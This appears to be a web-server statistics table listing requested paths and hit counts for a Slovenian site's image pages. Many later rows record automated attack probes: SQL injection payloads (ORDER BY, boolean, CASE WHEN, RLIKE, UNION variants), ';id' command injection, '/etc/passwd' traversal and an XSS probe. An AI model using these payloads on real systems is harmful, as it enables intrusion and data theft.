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368. | 13 | balance.gif //slike//stran_2/balance.gif |
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372. | 13 | //slike//stran_-2233%/ |
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382. | 12 | skrivalnice.gif //slike//stran_2/skrivalnice.gif |
383. | 12 | //slike//stran_-7575/ |
384. | 12 | //slike//stran_-6747/ |
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392. | 11 | //slike//stran_2/ |
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397. | 11 | obiralci.gif //slike//stran_3/obiralci.gif |
398. | 11 | female_brains.gif //slike//stran_4/female_brains.gif |
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400. | 11 | -5116 //slike//stran_1/-5116 |
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412. | 10 | //slike//stran_-7050/ |
413. | 10 | //slike//stran_-1780/ |
414. | 10 | //slike//stran_-1477/ |
415. | 10 | //slike//stran_-1374%/ |
416. | 10 | //slike//stran_3/ |
417. | 10 | ;id //slike//stran_4/;id |
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430. | 9 | //slike//stran_-7897%/ |
431. | 9 | //slike//stran_-5334/ |
432. | 9 | //slike//stran_-5561/ |
433. | 9 | -6547 //slike//stran_1/-6547 |
434. | 9 | -3550 //slike//stran_1/-3550 |
435. | 9 | //slike//stran_5...).,./ |
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442. | 8 | island.gif //slike//stran_1/island.gif |
443. | 8 | starsign.jpg //slike//stran_2/starsign.jpg |
444. | 8 | zen_rac.jpg //slike//stran_1/zen_rac.jpg |
445. | 8 | which_baby.jpg //slike//stran_2/which_baby.jpg |
446. | 8 | //slike//stran_-8955/ |
447. | 8 | //slike//stran_-2588/ |
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453. | 8 | //slike//stran_-6941/ |
454. | 8 | rc.jpg //slike//stran_4/rc.jpg |
455. | 8 | //slike//stran_2/ |
456. | 8 | //slike//stran_-4139/ |
457. | 8 | mouse.jpg //slike//stran_2/mouse.jpg |
458. | 8 | //slike//stran_-4112%/ |
459. | 8 | -3641 //slike//stran_1/-3641 |
460. | 8 | cat-bee.jpgÂż //slike//stran_2/cat-bee.jpgÂż |
461. | 8 | like_dad.jpg //slike//stran_3/like_dad.jpg |
462. | 7 | rip.jpg //slike//stran_2/rip.jpg |
463. | 7 | 007.jpg //slike//stran_3/007.jpg |
464. | 7 | tampax.jpg //slike//stran_1/tampax.jpg |
465. | 7 | wurstkoffer.jpg //slike//stran_3/wurstkoffer.jpg |
466. | 7 | maskota.gif //slike//stran_4/maskota.gif |
467. | 7 | bankomat_napaka.jpg //slike//stran_2/bankomat_napaka.jpg |
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471. | 7 | flight.jpg //slike//stran_1/flight.jpg |
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473. | 7 | sign.jpg //slike//stran_4/sign.jpg |
474. | 7 | colgate.jpg //slike//stran_1/colgate.jpg |
475. | 7 | mad.gif //slike//stran_1/mad.gif |
476. | 7 | shithouse.jpg //slike//stran_5/shithouse.jpg |
477. | 7 | pig.jpg //slike//stran_1/pig.jpg |
478. | 7 | knjiznica.jpg //slike//stran_1/knjiznica.jpg |
479. | 7 | free_billy.jpg //slike//stran_2/free_billy.jpg |
480. | 7 | 101-102.jpg //slike//stran_3/101-102.jpg |
481. | 7 | locevanje.gif //slike//stran_4/locevanje.gif |
482. | 7 | -6896 //slike//stran_1/-6896 |
483. | 7 | //slike//stran_-7531/ |
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486. | 7 | //slike//stran_3/ |
487. | 7 | //slike//stran_-3804/ |
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490. | 7 | //slike//stran_-8641/ |
491. | 7 | //slike//stran_-7342/ |
492. | 7 | //slike//stran_-3276/ |
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495. | 7 | balance.gif% //slike//stran_1/balance.gif% |
496. | 7 | //slike//stran_5/ |
497. | 7 | //slike//stran_1/ |
498. | 7 | cat-bee.jpgĹĽ //slike//stran_2/cat-bee.jpgĹĽ |
499. | 6 | stevilka.gif //slike//stran_2/stevilka.gif |
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501. | 6 | malcka.gif //slike//stran_4/malcka.gif |
502. | 6 | buglist.jpg //slike//stran_1/buglist.jpg |
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504. | 6 | eaten_mouse.jpg //slike//stran_3/eaten_mouse.jpg |
505. | 6 | zaseda.gif //slike//stran_4/zaseda.gif |
506. | 6 | windows_wait.jpg //slike//stran_1/windows_wait.jpg |
507. | 6 | //slike//stran_4/ |
508. | 6 | //slike//stran_-4001/ |
509. | 6 | //slike//stran_-1391%/ |
510. | 6 | //slike//stran_1%/ |
511. | 6 | //slike//stran_-5201/ |
512. | 6 | //slike//stran_1/ |
513. | 6 | -2302 //slike//stran_1/-2302 |
514. | 6 | //slike//stran_-8444/ |
515. | 6 | //slike//stran_-2845/ |
516. | 6 | //slike//stran_-2774%/ |
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518. | 6 | //slike//stran_-4703/ |
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520. | 6 | //slike//stran_-8301/ |
521. | 6 | //slike//stran_-4707%/ |
522. | 6 | -7793 //slike//stran_1/-7793 |
523. | 6 | //slike//stran_-8597/ |
524. | 6 | //slike//stran_-3960%/ |
525. | 6 | cat-bee.jpgĹĽ //slike//stran_2/cat-bee.jpgĹĽ |
526. | 6 | -9740 //slike//stran_1/-9740 |
527. | 6 | //slike//stran_-7709%/ |
528. | 6 | //slike//stran_-9123/ |
529. | 6 | //slike//stran_-8452/ |
530. | 6 | -4394 //slike//stran_1/-4394 |
531. | 6 | //slike//stran_-9260/ |
532. | 6 | //slike//stran_1./ |
533. | 6 | znaki.jpg //slike//stran_5/znaki.jpg |
534. | 6 | ;id; //slike//stran_4/;id; |
535. | 6 | //slike//stran_5/ |
536. | 6 | ' //slike//stran_1/' |
537. | 6 | ' //slike//stran_4/' |
538. | 5 | bush.jpg //slike//stran_4/bush.jpg |
539. | 5 | wininf05.jpg //slike//stran_1/wininf05.jpg |
540. | 5 | peachka.jpg //slike//stran_4/peachka.jpg |
541. | 5 | obletnica_poroke.jpg //slike//stran_2/obletnica_poroke.jpg |
542. | 5 | froc.jpg //slike//stran_3/froc.jpg |
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544. | 5 | -8435 //slike//stran_1/-8435 |
545. | 5 | development.jpg //slike//stran_2/development.jpg |
546. | 5 | -9406 //slike//stran_1/-9406 |
547. | 5 | -2000 //slike//stran_1/-2000 |
548. | 5 | -4544 //slike//stran_1/-4544 |
549. | 5 | cat-bee.jpgÂ? //slike//stran_2/cat-bee.jpgÂ? |
550. | 5 | //slike//stran_-4209/ |
551. | 5 | -6792 //slike//stran_1/-6792 |
552. | 5 | //slike//stran_-1312/ |
553. | 5 | -5429 //slike//stran_1/-5429 |
554. | 5 | //slike//stran_-2393%/ |
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556. | 5 | //slike//stran_-2053/ |
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558. | 5 | //slike//stran_-4921/ |
559. | 5 | //slike//stran_-9280/ |
560. | 5 | //slike//stran_1/ |
561. | 5 | -9480 //slike//stran_1/-9480 |
562. | 5 | //slike//stran_-8249/ |
563. | 5 | //slike//stran_-6910/ |
564. | 5 | //slike//stran_-9317/ |
565. | 5 | cat-bee.jpgÂ? //slike//stran_2/cat-bee.jpgÂ? |
566. | 5 | cat-bee.jpgÄŹĹĽËť? //slike//stran_2/cat-bee.jpgÄŹĹĽËť? |
567. | 5 | pig.jpg //slike//stran_'/pig.jpg |
568. | 4 | " //slike//stran_1/" |
569. | 4 | horror.jpg' //slike//horror.jpg' |
570. | 4 | -1932 //slike//stran_1/-1932 |
571. | 4 | -4086% //slike//stran_1/-4086% |
572. | 4 | -3763 //slike//stran_1/-3763 |
573. | 4 | //slike//stran_-9808/ |
574. | 4 | -7264 //slike//stran_1/-7264 |
575. | 4 | //slike//stran_-1876/ |
576. | 4 | //slike//stran_-4285/ |
577. | 4 | -2858 //slike//stran_1/-2858 |
578. | 4 | //slike//stran_-7657/ |
579. | 4 | -4352 //slike//stran_1/-4352 |
580. | 4 | //slike//stran_-8849/ |
581. | 4 | //slike//stran_-6720/ |
582. | 4 | -7490 //slike//stran_1/-7490 |
583. | 4 | //slike//stran_-3429/ |
584. | 4 | //slike//stran_-8376/ |
585. | 4 | -9511 //slike//stran_1/-9511 |
586. | 4 | -9288% //slike//stran_1/-9288% |
587. | 4 | -2410% //slike//stran_1/-2410% |
588. | 4 | -8574 //slike//stran_1/-8574 |
589. | 4 | -9325 //slike//stran_1/-9325 |
590. | 4 | -6535 //slike//stran_1/-6535 |
591. | 4 | //slike//stran_-7047/ |
592. | 4 | -3234% //slike//stran_1/-3234% |
593. | 4 | -4353 //slike//stran_1/-4353 |
594. | 4 | //slike//stran_5%/ |
595. | 4 | ' //slike//stran_2/' |
596. | 4 | rc.jpg //slike//stran_'/rc.jpg |
597. | 3 | /etc/passwd //slike//stran_2//etc/passwd |
598. | 3 | cat-bee.jpg? //slike//stran_2/cat-bee.jpg? |
599. | 3 | motor.jpg //slike//stran_3'/motor.jpg |
600. | 3 | motor.jpg' //slike//stran_3/motor.jpg' |
601. | 3 | balance.gif //slike//stran_1'/balance.gif |
602. | 3 | balance.gif' //slike//stran_1/balance.gif' |
603. | 3 | balance.gif //slike//stran_1 AND 7750/balance.gif |
604. | 3 | //slike//stran_-8058/ |
605. | 3 | //slike//stran_-9905/ |
606. | 3 | //slike//stran_-3281/ |
607. | 3 | //slike//stran_-1665/ |
608. | 3 | //slike//stran_-4000/ |
609. | 3 | //slike//stran_-4966/ |
610. | 3 | //slike//stran_-4675/ |
611. | 3 | //slike//stran_-4607/ |
612. | 3 | //slike//stran_-9481/ |
613. | 3 | -9734 //slike//stran_1/-9734 |
614. | 3 | //slike//stran_-5378/ |
615. | 3 | tanning.jpg //slike//stran_2/tanning.jpg |
616. | 3 | (cast((chr(113) //slike//stran_5/(cast((chr(113) |
617. | 2 | tajnica.gif //slike//stran_1'[0]/tajnica.gif |
618. | 2 | tajnica.gif'[0] //slike//stran_1/tajnica.gif'[0] |
619. | 2 | napad.jpg //slike//stran_2'[0]/napad.jpg |
620. | 2 | napad.jpg'[0] //slike//stran_2/napad.jpg'[0] |
621. | 2 | " //slike//stran_2/" |
622. | 2 | balance.gif //slike//stran_1));SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
623. | 2 | balance.gif //slike//stran_1 ORDER BY 1-- MTsN/balance.gif |
624. | 2 | balance.gif //slike//stran_1 ORDER BY 6916-- MRSU/balance.gif |
625. | 2 | balance.gif //slike//stran_1 ORDER BY 1-- aDvH/balance.gif |
626. | 2 | balance.gif //slike//stran_1 ORDER BY 4513-- oujW/balance.gif |
627. | 2 | balance.gif //slike//stran_1 ORDER BY 1#/balance.gif |
628. | 2 | balance.gif //slike//stran_1') ORDER BY 1#/balance.gif |
629. | 2 | balance.gif //slike//stran_1' ORDER BY 1#/balance.gif |
630. | 2 | (cast((chr(113) //slike//stran_1/(cast((chr(113) |
631. | 2 | balance.gif order by 1-- pnfa //slike//stran_1/balance.gif order by 1-- pnfa |
632. | 2 | balance.gif order by 6346-- bwdp //slike//stran_1/balance.gif order by 6346-- bwdp |
633. | 2 | balance.gif order by 1-- ihkk //slike//stran_1/balance.gif order by 1-- ihkk |
634. | 2 | balance.gif order by 1335-- ishu //slike//stran_1/balance.gif order by 1335-- ishu |
635. | 2 | balance.gif order by 1# //slike//stran_1/balance.gif order by 1# |
636. | 2 | balance.gif') order by 1# //slike//stran_1/balance.gif') order by 1# |
637. | 2 | balance.gif' order by 1# //slike//stran_1/balance.gif' order by 1# |
638. | 2 | stamp.jpg //slike//stran_5'/stamp.jpg |
639. | 2 | stamp.jpg' //slike//stran_5/stamp.jpg' |
640. | 2 | keyboard.jpg //slike//stran_1'/keyboard.jpg |
641. | 2 | keyboard.jpg' //slike//stran_1/keyboard.jpg' |
642. | 2 | tampax.jpg //slike//stran_1'/tampax.jpg |
643. | 2 | tampax.jpg' //slike//stran_1/tampax.jpg' |
644. | 2 | /etc/passwd //slike//stran_3//etc/passwd |
645. | 2 | balance.gif //slike//stran_-5141 OR 3784/balance.gif |
646. | 2 | -1043 or 3085 //slike//stran_1/-1043 or 3085 |
647. | 2 | //slike//stran_1 ORDER BY 1/ |
648. | 2 | cat-bee.jpgÂż //slike//stran_2/cat-bee.jpgÂż |
649. | 2 | -1794 or 2654 //slike//stran_1/-1794 or 2654 |
650. | 2 | -2046 or 4970 //slike//stran_1/-2046 or 4970 |
651. | 2 | //slike//stran_1 ORDER BY 9284/ |
652. | 2 | -5198 //slike//stran_1/-5198 |
653. | 2 | -9750 //slike//stran_1/-9750 |
654. | 2 | -1625 //slike//stran_1/-1625 |
655. | 2 | balance.gif and 6368 //slike//stran_1/balance.gif and 6368 |
656. | 2 | prepovedano.gif //slike//stran_5 ORDER BY 1#/prepovedano.gif |
657. | 2 | prepovedano.gif //slike//stran_5') ORDER BY 1#/prepovedano.gif |
658. | 2 | prepovedano.gif //slike//stran_5' ORDER BY 1#/prepovedano.gif |
659. | 2 | prepovedano.gif order by 1# //slike//stran_5/prepovedano.gif order by 1# |
660. | 2 | prepovedano.gif') order by 1# //slike//stran_5/prepovedano.gif') order by 1# |
661. | 2 | prepovedano.gif' order by 1# //slike//stran_5/prepovedano.gif' order by 1# |
662. | 2 | balance.gif order by 1# //slike//stran_1 AND 5486/balance.gif order by 1# |
663. | 2 | balance.gif') order by 1# //slike//stran_1 AND 5486/balance.gif') order by 1# |
664. | 2 | balance.gif' order by 1# //slike//stran_1 AND 5486/balance.gif' order by 1# |
665. | 2 | //slike//stran_(CAST((CHR(113)/ |
666. | 2 | prepovedano.gif% //slike//stran_5/prepovedano.gif% |
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668. | 2 | %27 //slike//stran_2/%27 |
669. | 2 | show.jpg' //slike//show.jpg' |
670. | 2 | forecast.jpg //slike//stran_'/forecast.jpg |
671. | 2 | %27 //slike//stran_5/%27 |
672. | 2 | prepovedano.gif //slike//stran_%27/prepovedano.gif |
673. | 2 | //slike// |
674. | 2 | prepovedano.gif //slike//stran_'/prepovedano.gif |
675. | 2 | ' //slike//stran_5/' |
676. | 2 | %27 //slike//%27 |
677. | 1 | slo.gif //slike//stran_1'[0]/slo.gif |
678. | 1 | slo.gif'[0] //slike//stran_1/slo.gif'[0] |
679. | 1 | kosilo.gif //slike//stran_1'[0]/kosilo.gif |
680. | 1 | kosilo.gif'[0] //slike//stran_1/kosilo.gif'[0] |
681. | 1 | kruh.gif //slike//stran_1'[0]/kruh.gif |
682. | 1 | kruh.gif'[0] //slike//stran_1/kruh.gif'[0] |
683. | 1 | balance.gif //slike//stran_1.'(),.))."/balance.gif |
684. | 1 | AUfGMb&file=balance.gif','','scrollbars=1,resizable=1');">balance.gif //slike//stran_1'HgiYNQ<'">AUfGMb/balance.gif |
685. | 1 | balance.gif //slike//stran_1) AND 7846=3842 AND (1407=1407/balance.gif |
686. | 1 | balance.gif //slike//stran_1) AND 7750=7750 AND (2420=2420/balance.gif |
687. | 1 | balance.gif //slike//stran_1)) AND 9969=6631 AND ((2273=2273/balance.gif |
688. | 1 | balance.gif //slike//stran_1)) AND 7750=7750 AND ((3524=3524/balance.gif |
689. | 1 | balance.gif //slike//stran_1 AND 5486=4819/balance.gif |
690. | 1 | balance.gif //slike//stran_1 AND 7750=7750/balance.gif |
691. | 1 | balance.gif //slike//stran_1 AND 7808=7686-- kbVy/balance.gif |
692. | 1 | balance.gif //slike//stran_1 AND 7750=7750-- ldYh/balance.gif |
693. | 1 | balance.gif //slike//stran_1') AND 9327=8853 AND ('HKfP'='HKfP/balance.gif |
694. | 1 | balance.gif //slike//stran_1') AND 7750=7750 AND ('aOmK'='aOmK/balance.gif |
695. | 1 | balance.gif //slike//stran_1')) AND 5142=8364 AND (('TXSp'='TXSp/balance.gif |
696. | 1 | balance.gif //slike//stran_1')) AND 7750=7750 AND (('jwuN'='jwuN/balance.gif |
697. | 1 | balance.gif //slike//stran_1' AND 4243=4131 AND 'SwJP'='SwJP/balance.gif |
698. | 1 | balance.gif //slike//stran_1' AND 7750=7750 AND 'HCTg'='HCTg/balance.gif |
699. | 1 | balance.gif //slike//stran_1') AND 3204=5638 AND ('boqM' LIKE 'boqM/balance.gif |
700. | 1 | balance.gif //slike//stran_1') AND 7750=7750 AND ('PNZk' LIKE 'PNZk/balance.gif |
701. | 1 | balance.gif //slike//stran_1%' AND 6104=1220 AND 'NYUE%'='NYUE/balance.gif |
702. | 1 | balance.gif //slike//stran_1%' AND 7750=7750 AND 'gDVv%'='gDVv/balance.gif |
703. | 1 | balance.gif //slike//stran_1' AND 3703=8302 AND 'dqdN' LIKE 'dqdN/balance.gif |
704. | 1 | balance.gif //slike//stran_1' AND 7750=7750 AND 'Znzf' LIKE 'Znzf/balance.gif |
705. | 1 | balance.gif //slike//stran_1") AND 3917=9174 AND ("ybfW"="ybfW/balance.gif |
706. | 1 | balance.gif //slike//stran_1") AND 7750=7750 AND ("uqTT"="uqTT/balance.gif |
707. | 1 | balance.gif //slike//stran_1" AND 8955=7379 AND "ElXg"="ElXg/balance.gif |
708. | 1 | balance.gif //slike//stran_1" AND 7750=7750 AND "rGVl"="rGVl/balance.gif |
709. | 1 | balance.gif //slike//stran_-4940) OR 4659=6976 AND (7515=7515/balance.gif |
710. | 1 | balance.gif //slike//stran_-9739) OR 3784=3784 AND (1463=1463/balance.gif |
711. | 1 | balance.gif //slike//stran_-2956)) OR 8796=7364 AND ((7265=7265/balance.gif |
712. | 1 | balance.gif //slike//stran_-1165)) OR 3784=3784 AND ((4181=4181/balance.gif |
713. | 1 | balance.gif //slike//stran_-4684 OR 5672=7009/balance.gif |
714. | 1 | balance.gif //slike//stran_-5141 OR 3784=3784/balance.gif |
715. | 1 | balance.gif //slike//stran_-3033 OR 2728=5759-- mefc/balance.gif |
716. | 1 | balance.gif //slike//stran_-1402 OR 3784=3784-- rAFM/balance.gif |
717. | 1 | balance.gif //slike//stran_-5561') OR 5581=2981 AND ('rFqK'='rFqK/balance.gif |
718. | 1 | balance.gif //slike//stran_-7575') OR 3784=3784 AND ('BVkl'='BVkl/balance.gif |
719. | 1 | balance.gif //slike//stran_-1312')) OR 6984=3931 AND (('tvvW'='tvvW/balance.gif |
720. | 1 | balance.gif //slike//stran_-8444')) OR 3784=3784 AND (('YTjP'='YTjP/balance.gif |
721. | 1 | balance.gif //slike//stran_-5216' OR 9224=3318 AND 'MpLd'='MpLd/balance.gif |
722. | 1 | balance.gif //slike//stran_-8955' OR 3784=3784 AND 'XEvR'='XEvR/balance.gif |
723. | 1 | balance.gif //slike//stran_-9279') OR 7464=1532 AND ('wxOD' LIKE 'wxOD/balance.gif |
724. | 1 | balance.gif //slike//stran_-1302') OR 3784=3784 AND ('jNtU' LIKE 'jNtU/balance.gif |
725. | 1 | balance.gif //slike//stran_-1374%' OR 6309=9347 AND 'tWSI%'='tWSI/balance.gif |
726. | 1 | balance.gif //slike//stran_-2233%' OR 3784=3784 AND 'Udbj%'='Udbj/balance.gif |
727. | 1 | balance.gif //slike//stran_-4098' OR 2896=2426 AND 'znuU' LIKE 'znuU/balance.gif |
728. | 1 | balance.gif //slike//stran_-8452' OR 3784=3784 AND 'IVFV' LIKE 'IVFV/balance.gif |
729. | 1 | balance.gif //slike//stran_-6720") OR 8863=1739 AND ("cNqz"="cNqz/balance.gif |
730. | 1 | balance.gif //slike//stran_-9905") OR 3784=3784 AND ("zXde"="zXde/balance.gif |
731. | 1 | balance.gif //slike//stran_-1665" OR 9169=7373 AND "eFxH"="eFxH/balance.gif |
732. | 1 | balance.gif //slike//stran_-3429" OR 3784=3784 AND "OJNQ"="OJNQ/balance.gif |
733. | 1 | balance.gif //slike//stran_1) AND 3880=(SELECT (CASE WHEN (3880=5010) THEN 3880 ELSE (SELECT 5010 UNION SELECT 4497) END))-- OhMc/balance.gif |
734. | 1 | balance.gif //slike//stran_1) AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- xgps/balance.gif |
735. | 1 | balance.gif //slike//stran_1)) AND 7737=(SELECT (CASE WHEN (7737=1196) THEN 7737 ELSE (SELECT 1196 UNION SELECT 7561) END))-- Zups/balance.gif |
736. | 1 | balance.gif //slike//stran_1)) AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- zUYj/balance.gif |
737. | 1 | balance.gif //slike//stran_1 AND 9730=(SELECT (CASE WHEN (9730=6288) THEN 9730 ELSE (SELECT 6288 UNION SELECT 1252) END))-- Oqmx/balance.gif |
738. | 1 | balance.gif //slike//stran_1 AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- syHN/balance.gif |
739. | 1 | balance.gif //slike//stran_1') AND 9028=(SELECT (CASE WHEN (9028=1645) THEN 9028 ELSE (SELECT 1645 UNION SELECT 6633) END))-- lGih/balance.gif |
740. | 1 | balance.gif //slike//stran_1') AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- GFdW/balance.gif |
741. | 1 | balance.gif //slike//stran_1')) AND 3945=(SELECT (CASE WHEN (3945=2621) THEN 3945 ELSE (SELECT 2621 UNION SELECT 8801) END))-- lzDF/balance.gif |
742. | 1 | balance.gif //slike//stran_1')) AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- UQMJ/balance.gif |
743. | 1 | balance.gif //slike//stran_1' AND 7833=(SELECT (CASE WHEN (7833=3621) THEN 7833 ELSE (SELECT 3621 UNION SELECT 2155) END))-- fdvS/balance.gif |
744. | 1 | balance.gif //slike//stran_1' AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- txun/balance.gif |
745. | 1 | balance.gif //slike//stran_1%' AND 5429=(SELECT (CASE WHEN (5429=9224) THEN 5429 ELSE (SELECT 9224 UNION SELECT 1790) END))-- ODNP/balance.gif |
746. | 1 | balance.gif //slike//stran_1%' AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- ZhyC/balance.gif |
747. | 1 | balance.gif //slike//stran_1") AND 3072=(SELECT (CASE WHEN (3072=3029) THEN 3072 ELSE (SELECT 3029 UNION SELECT 5431) END))-- meGY/balance.gif |
748. | 1 | balance.gif //slike//stran_1") AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- aceq/balance.gif |
749. | 1 | balance.gif //slike//stran_1" AND 5241=(SELECT (CASE WHEN (5241=9504) THEN 5241 ELSE (SELECT 9504 UNION SELECT 6121) END))-- yIIA/balance.gif |
750. | 1 | balance.gif //slike//stran_1" AND 6490=(SELECT (CASE WHEN (6490=6490) THEN 6490 ELSE (SELECT 6595 UNION SELECT 3943) END))-- MCLG/balance.gif |
751. | 1 | balance.gif //slike//stran_-6082) OR 9179=(SELECT (CASE WHEN (9179=4741) THEN 9179 ELSE (SELECT 4741 UNION SELECT 8990) END))-- bOek/balance.gif |
752. | 1 | balance.gif //slike//stran_-2558) OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- lOow/balance.gif |
753. | 1 | balance.gif //slike//stran_-5330)) OR 2914=(SELECT (CASE WHEN (2914=7012) THEN 2914 ELSE (SELECT 7012 UNION SELECT 9966) END))-- BUwx/balance.gif |
754. | 1 | balance.gif //slike//stran_-4552)) OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- ineP/balance.gif |
755. | 1 | balance.gif //slike//stran_-4273 OR 7035=(SELECT (CASE WHEN (7035=2710) THEN 7035 ELSE (SELECT 2710 UNION SELECT 8835) END))-- gKKf/balance.gif |
756. | 1 | balance.gif //slike//stran_-2215 OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- uEXb/balance.gif |
757. | 1 | balance.gif //slike//stran_-6910') OR 7677=(SELECT (CASE WHEN (7677=8451) THEN 7677 ELSE (SELECT 8451 UNION SELECT 2500) END))-- nNNH/balance.gif |
758. | 1 | balance.gif //slike//stran_-3309') OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- EnFT/balance.gif |
759. | 1 | balance.gif //slike//stran_-4139')) OR 4093=(SELECT (CASE WHEN (4093=5897) THEN 4093 ELSE (SELECT 5897 UNION SELECT 8647) END))-- srdP/balance.gif |
760. | 1 | balance.gif //slike//stran_-7342')) OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- plQf/balance.gif |
761. | 1 | balance.gif //slike//stran_-7702' OR 4522=(SELECT (CASE WHEN (4522=8687) THEN 4522 ELSE (SELECT 8687 UNION SELECT 8235) END))-- tirU/balance.gif |
762. | 1 | balance.gif //slike//stran_-5334' OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- NIdp/balance.gif |
763. | 1 | balance.gif //slike//stran_-2393%' OR 7296=(SELECT (CASE WHEN (7296=9173) THEN 7296 ELSE (SELECT 9173 UNION SELECT 9261) END))-- pITE/balance.gif |
764. | 1 | balance.gif //slike//stran_-1391%' OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- eKeE/balance.gif |
765. | 1 | balance.gif //slike//stran_-9280") OR 5624=(SELECT (CASE WHEN (5624=3118) THEN 5624 ELSE (SELECT 3118 UNION SELECT 8193) END))-- lJhu/balance.gif |
766. | 1 | balance.gif //slike//stran_-4966") OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- GPQn/balance.gif |
767. | 1 | balance.gif //slike//stran_-1876" OR 7353=(SELECT (CASE WHEN (7353=3804) THEN 7353 ELSE (SELECT 3804 UNION SELECT 5162) END))-- KtMQ/balance.gif |
768. | 1 | balance.gif //slike//stran_-4607" OR 4116=(SELECT (CASE WHEN (4116=4116) THEN 4116 ELSE (SELECT 7136 UNION SELECT 6973) END))-- yXQA/balance.gif |
769. | 1 | balance.gif //slike//stran_1) AND 1063=1279-- gSQz/balance.gif |
770. | 1 | balance.gif //slike//stran_1) AND 4857=4857-- qfOW/balance.gif |
771. | 1 | balance.gif //slike//stran_1)) AND 3942=1651-- pXWt/balance.gif |
772. | 1 | balance.gif //slike//stran_1)) AND 4857=4857-- UVnP/balance.gif |
773. | 1 | balance.gif //slike//stran_1') AND 6595=5198-- tVIi/balance.gif |
774. | 1 | balance.gif //slike//stran_1') AND 4857=4857-- glXD/balance.gif |
775. | 1 | balance.gif //slike//stran_1')) AND 9196=6420-- tGQZ/balance.gif |
776. | 1 | balance.gif //slike//stran_1')) AND 4857=4857-- Zkaa/balance.gif |
777. | 1 | balance.gif //slike//stran_1' AND 7822=2437-- XcxN/balance.gif |
778. | 1 | balance.gif //slike//stran_1' AND 4857=4857-- aNVI/balance.gif |
779. | 1 | balance.gif //slike//stran_1%' AND 7870=3802-- BKHL/balance.gif |
780. | 1 | balance.gif //slike//stran_1%' AND 4857=4857-- uDMz/balance.gif |
781. | 1 | balance.gif //slike//stran_1") AND 8510=5055-- JuLh/balance.gif |
782. | 1 | balance.gif //slike//stran_1") AND 4857=4857-- hPjG/balance.gif |
783. | 1 | balance.gif //slike//stran_1" AND 4737=3804-- RjiM/balance.gif |
784. | 1 | balance.gif //slike//stran_1" AND 4857=4857-- PiFG/balance.gif |
785. | 1 | balance.gif //slike//stran_-9673) OR 4033=2699-- fyXC/balance.gif |
786. | 1 | balance.gif //slike//stran_-9230) OR 8724=8724-- rAXT/balance.gif |
787. | 1 | balance.gif //slike//stran_-7414)) OR 7746=5954-- TvEt/balance.gif |
788. | 1 | balance.gif //slike//stran_-9866)) OR 8724=8724-- ldAn/balance.gif |
789. | 1 | balance.gif //slike//stran_-9260') OR 4982=3707-- eITK/balance.gif |
790. | 1 | balance.gif //slike//stran_-8301') OR 8724=8724-- qJRc/balance.gif |
791. | 1 | balance.gif //slike//stran_-6340')) OR 9314=1659-- gbYy/balance.gif |
792. | 1 | balance.gif //slike//stran_-7050')) OR 8724=8724-- VNwu/balance.gif |
793. | 1 | balance.gif //slike//stran_-6941' OR 1037=9925-- htRR/balance.gif |
794. | 1 | balance.gif //slike//stran_-4703' OR 8724=8724-- UQmg/balance.gif |
795. | 1 | balance.gif //slike//stran_-2774%' OR 1910=9705-- gxWd/balance.gif |
796. | 1 | balance.gif //slike//stran_-4707%' OR 8724=8724-- ZChq/balance.gif |
797. | 1 | balance.gif //slike//stran_-5378") OR 8184=6666-- bGOb/balance.gif |
798. | 1 | balance.gif //slike//stran_-8058") OR 8724=8724-- ZYQK/balance.gif |
799. | 1 | balance.gif //slike//stran_-8849" OR 4264=9009-- UpuW/balance.gif |
800. | 1 | balance.gif //slike//stran_-4285" OR 8724=8724-- DePY/balance.gif |
801. | 1 | balance.gif //slike//stran_1) RLIKE (SELECT (CASE WHEN (6063=7541) THEN 1 ELSE 0x28 END)) AND (5102=5102/balance.gif |
802. | 1 | balance.gif //slike//stran_1) RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND (3412=3412/balance.gif |
803. | 1 | balance.gif //slike//stran_1)) RLIKE (SELECT (CASE WHEN (7341=5877) THEN 1 ELSE 0x28 END)) AND ((8398=8398/balance.gif |
804. | 1 | balance.gif //slike//stran_1)) RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND ((1705=1705/balance.gif |
805. | 1 | balance.gif //slike//stran_1 RLIKE (SELECT (CASE WHEN (1197=9077) THEN 1 ELSE 0x28 END))/balance.gif |
806. | 1 | balance.gif //slike//stran_1 RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END))/balance.gif |
807. | 1 | balance.gif //slike//stran_1 RLIKE (SELECT (CASE WHEN (5660=9919) THEN 1 ELSE 0x28 END))-- uvnD/balance.gif |
